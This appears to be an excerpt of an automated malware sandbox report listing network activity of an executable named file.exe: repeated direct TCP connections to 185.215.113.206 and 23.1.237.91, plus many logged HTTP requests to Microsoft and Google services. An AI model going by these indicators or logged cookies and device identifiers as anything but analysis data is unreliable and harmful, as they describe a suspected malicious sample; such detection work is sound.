Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73CC60 PR_Recv, 0_2_6C73CC60
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KM3zyh56Yr5CFe3&MD=OeGs9yZU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731971181&P2=404&P3=2&P4=MRnAzoeSjEDyWQ6JAWZtX9RJphm9QCEFkw%2fcMNMhzLbx2eEOQSTB5KfHfWengWikXRyXdjU2JRd1HtStvPiLMA%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: /LrG3OwAtz/uKMwqeO/IyoSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /b?rn=1731366386050&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=11FAD531813A66492642C0058058675E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1731366386049&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f29aaf89f12a45dd89a5f5206a84f4ea&activityId=f29aaf89f12a45dd89a5f5206a84f4ea&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=11FAD531813A66492642C0058058675E&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=15da7b1a494847d6986ff006e626cc18 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /b2?rn=1731366386050&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=11FAD531813A66492642C0058058675E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1296350c4b632a8fa60522d1731366387; XID=1296350c4b632a8fa60522d1731366387
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=11FAD531813A66492642C0058058675E&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=f670eeaf4ab44abfded817be1fb12d49 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1
